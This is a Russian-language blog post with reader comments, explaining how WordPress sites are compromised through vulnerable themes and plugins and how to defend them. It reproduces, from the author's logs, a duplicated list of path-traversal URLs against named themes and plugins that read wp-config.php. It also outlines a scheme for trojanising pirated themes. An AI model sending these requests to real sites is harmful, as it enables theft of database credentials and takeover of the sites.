Взлом WordPress через уязвимости Тем и Плагинов

Хочу вам рассказать про то как простыми шагами взламывают популярный движок CMS WordPress. Забавные уязвимости в темах и плагинах и как можно попробовать защититься от атак на сайт.

Вся информация несет ознакомительный характер и никоим образом не есть инструкция или призыв к взлому сайтов

vloНам известно, что WordPress как и все остальные популярные CMS написан на языке PHP и имеет открытые исходные кода. И злоумышленникам приходится трудно, ведь популярные CMS имеют огромное сообщество, которое постоянно отслеживает ошибки, уязвимости и сразу же их устраняет.

Все это про сам WordPress, а как же темы и плагины, которых тысячи тысяч…?

Имея компьютер и интернет даже ребенок может скачать исходные коды тем и плагинов. Ну и соответственно поискать в них уязвимости.

Так и делают. Находим, например, не очень популярную но скачиваемую тему для WordPress

  • Ищем там уязвимость в коде;
  • Думаем;
  • Составляем запрос: Сайт жертвы/wp-content/themes/имя темы/function.php?openfile=(адрес к файлу config.php)
  • Получаем Конфиг с паролями к базе данных и всем остальным.

Как вы поняли. В файле function.php была уязвимость в функции открытия файла. В эту функцию можно задать любой файл, но нам нужен только конфиг.

Вот, что я снял с логов на своих сайтах.

  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
  • /wp-content/themes/markant/download.php?file=../../wp-config.php
  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
  • /force-download.php?file=../wp-config.php
  • /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
  • /wp-content/themes/felis/download.php?file=../wp-config.php
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
  • /wp-content/themes/markant/download.php?file=../../wp-config.php
  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
  • /force-download.php?file=../wp-config.php
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
  • /wp-content/themes/felis/download.php?file=../wp-config.php

Бот-парсер, пытался получить конфиг просто перебирая уязвимые темы и плагины. И если бы у меня была установлена, например, тема lote27 то злоумышленник получил бы доступ к сайту.

А ведь я посмотрел некоторые темы из тех, что пытались взломать. И на их официальных сайтах стоят эти темы по 60$ и даже не бесплатные.

freeЕсть еще один коварный способ, которым могут пользоваться злоумышленники.

  • Покупаем  или добываем тему для WordPress или ее PRO версию (то есть, которую хотят скачать но нужно платить)
  • Смотрим исходные кода темы.
  • Добавляем в исходный код небольшие «инъекции» своего кода.
  • Редактируем style.css чтобы тема не обновлялась, когда выйдут новые версии.
  • Выкладываем эту тему везде, где это возможно.
  • Пишем СКАЧАТЬ БЕСПЛАТНО Тему для WordPress!!!!

Мышеловка готова. Тему сразу же начнут скачивать по всему миру. И через некоторое время злоумышленник просто запустит скрипт на сайтах с темой и получит доступ.

Как защитить сайт?

  • Доверить это дело профессионалам;
  • Скачивать темы, плагины только с официального репозитория WordPress;
  • Не скачивать подозрительные темы и плагины. Будь они платные или бесплатные;
  • Удалять ненужные темы из папки themes в wp-content;
  • Удалять неиспользуемые плагины
  • Не использовать +100500 плагинов если они не так уж нужны.
  • Не вестись на «бесплатно» и «сделаю сайт за 1000 грн!«
  • Выбирать хороший, качественный хостинг.

Помните, что работа других людей стоит денег, а работа мозгами стоит больше денег. Если вы действительно беспокоитесь за сохранность вашей информации тщательней выбирайте сотрудников.

Ну а сейчас в сети полно разной информации про взлом WordPress или плагинов к нему. Что даже не успеваешь за всем уследить. Сейчас актуальна версия WordPress 4.3.1 и конечно же имеет уязвимости. Их опубликуем в следующих статьях после того как их исправят . 

Так же будет много интересных статей как защитится от кардеров, ворующих ваши кредитный карты и про популярные вирусные атаки.

А вы как думаете, про какую уязвимость WordPress стоит еще написать? Или у вас есть пожелания и комментарии? Буду рад ответить.

5 комментариев

  • Аноним Ответить

    Взлом вордпресс всегда интересная тема если знаете уязвимости скиньте мне мейл буду благодарен 🙂

  • InSys Ответить

    Гм… тут же был мой коммент? насчет джумлы

    А по теме, буквально вчера имел огромную неприятность. Давным давно поставил клиенту пиратскую (каюсь) тему на WP (от theme forest). Вчера пишет — похекали его. Оказывается в теме трой был. Обидно получилось…(

    • Good Developers Ответить

      помню коммент. сорри. Обновил сайт, все не импортировалось. Скоро добавлю.

      Так оно так и бывает) Если сам весь код темы не пересмотришь, то обязательно трой влепишь куда то)
      Я всегда удивлялся, когда у меня собирают инфу (адрес имя телефон) как они ее оберегать будут? Если в офисе компании кто то поставит ломаный софт или напишет пароли на бумажку и приклеит на холодильник)

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *